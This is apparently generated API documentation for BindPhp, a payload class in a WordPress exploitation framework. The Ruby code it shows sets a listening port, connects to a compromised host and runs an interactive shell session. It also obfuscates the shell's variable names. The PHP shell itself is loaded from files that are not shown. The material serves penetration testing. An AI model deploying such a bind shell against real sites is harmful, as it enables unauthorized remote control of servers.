Class: Wpxf::Payloads::BindPhp

Inherits:
Wpxf::Payload show all
Includes:
Wpxf, Options, SocketHelper
Defined in:
lib/wpxf/payloads/bind_php.rb

Overview

A PHP shell bound to an IPv4 address.

Instance Attribute Summary collapse

Attributes included from Options

#datastore, #options

Attributes inherited from Wpxf::Payload

#queued_commands

Instance Method Summary collapse

Methods included from SocketHelper

#execute_queued_commands, #start_socket_io_loop, #start_socket_read_loop, #start_socket_write_loop

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Wpxf::Payload

#encoded, #enqueue_command, #escape_single_quotes, #generate_vars, #php_preamble, #random_var_name

Constructor Details

#initializeBindPhp

Returns a new instance of BindPhp.



13
14
15
16
17
18
19
20
21
22
23
24
 
# File 'lib/wpxf/payloads/bind_php.rb', line 13

def initialize
  super

  register_options([
    PortOption.new(
      name: 'lport',
      required: true,
      default: 1234,
      desc: 'The port being used to listen for incoming connections'
    )
  ])
end

Instance Attribute Details

#hostObject

Returns the value of attribute host.



93
94
95
 
# File 'lib/wpxf/payloads/bind_php.rb', line 93

def host
  @host
end

Instance Method Details

#check(mod) ⇒ Object 



26
27
28
29
30
31
32
 
# File 'lib/wpxf/payloads/bind_php.rb', line 26

def check(mod)
  if mod.get_option('proxy')
    mod.emit_warning 'The proxy option for this module is only used for '\
                     'HTTP connections and will NOT be used for the TCP '\
                     'connection that the payload establishes'
  end
end

#cleanupObject 



89
90
91
 
# File 'lib/wpxf/payloads/bind_php.rb', line 89

def cleanup
  self.queued_commands = []
end

#connect_to_host(event_emitter) ⇒ Object 



42
43
44
45
46
47
48
49
50
51
52
53
54
55
 
# File 'lib/wpxf/payloads/bind_php.rb', line 42

def connect_to_host(event_emitter)
  event_emitter.emit_info "Connecting to #{host}:#{lport}..."
  socket = nil
  error = ''

  begin
    socket = TCPSocket.new(host, lport)
  rescue StandardError => e
    error = e
  end

  event_emitter.emit_error "Failed to connect to #{host}:#{lport} #{error}" unless socket
  socket
end

#constantsObject 



80
81
82
 
# File 'lib/wpxf/payloads/bind_php.rb', line 80

def constants
  { 'port' => lport }
end

#lportObject 



34
35
36
 
# File 'lib/wpxf/payloads/bind_php.rb', line 34

def lport
  normalized_option_value('lport')
end

#obfuscated_variablesObject 



72
73
74
75
76
77
78
 
# File 'lib/wpxf/payloads/bind_php.rb', line 72

def obfuscated_variables
  super +
    [
      'cmd', 'disabled', 'output', 'handle', 'pipes', 'fp',
      'port', 'scl', 'sock', 'ret', 'msg_sock', 'r', 'w', 'e'
    ]
end

#post_exploit(mod) ⇒ Object 



57
58
59
60
61
62
63
64
65
66
67
68
69
70
 
# File 'lib/wpxf/payloads/bind_php.rb', line 57

def post_exploit(mod)
  socket = connect_to_host(mod)
  return false unless socket

  Wpxf.change_stdout_sync(true) do
    mod.emit_success 'Established a session'
    start_socket_io_loop(socket, mod)
    socket.close
    puts
    mod.emit_info "Disconnected from #{host}:#{lport}"
  end

  true
end

#prepare(mod) ⇒ Object 



38
39
40
 
# File 'lib/wpxf/payloads/bind_php.rb', line 38

def prepare(mod)
  self.host = mod.get_option_value('host')
end

#rawObject 



84
85
86
87
 
# File 'lib/wpxf/payloads/bind_php.rb', line 84

def raw
  "#{DataFile.new('php', 'exec_methods.php').php_content}"\
  "#{DataFile.new('php', 'bind_php.php').php_content}"
end